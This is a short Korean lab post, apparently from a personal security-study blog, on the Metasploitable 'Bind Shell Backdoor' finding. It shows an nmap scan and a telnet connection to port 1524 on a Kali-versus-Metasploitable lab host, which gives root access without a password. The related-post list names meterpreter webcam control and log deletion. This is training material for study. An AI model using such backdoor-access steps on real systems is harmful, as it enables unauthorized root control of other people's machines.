Self-Improvement
Bind Shell Backdoor Detection 취약점 본문
*정의
공격자는 원격포트를 통해 인증없이 연결하고 명령어을 직접 전송하여 사용 할 수 있다.
Attacker : kali
Victim : metasploitable
*실습
(kali)
root@kali:~# nmap -sV -p 1524 192.168.10.134
root@kali:~# telnet 192.168.10.134 1524
암호입력없이 root권한으로 연결이 되어진다.
'Kali Linux > Metasploitable' 카테고리의 다른 글
VNC Server 'password' Password 취약점 (0) | 2018.10.21 |
---|---|
NFS Exported Share Information Disclosure 취약점 (0) | 2018.10.21 |
세션을 이용한 post/hashdump (패스워드 크랙) 실습 (0) | 2018.10.21 |
meterpreter을 이용한 노트북 webcam 제어 (0) | 2018.10.21 |
meterpreter을 이용한 Windows 2008 R2의 로그 삭제 (0) | 2018.10.21 |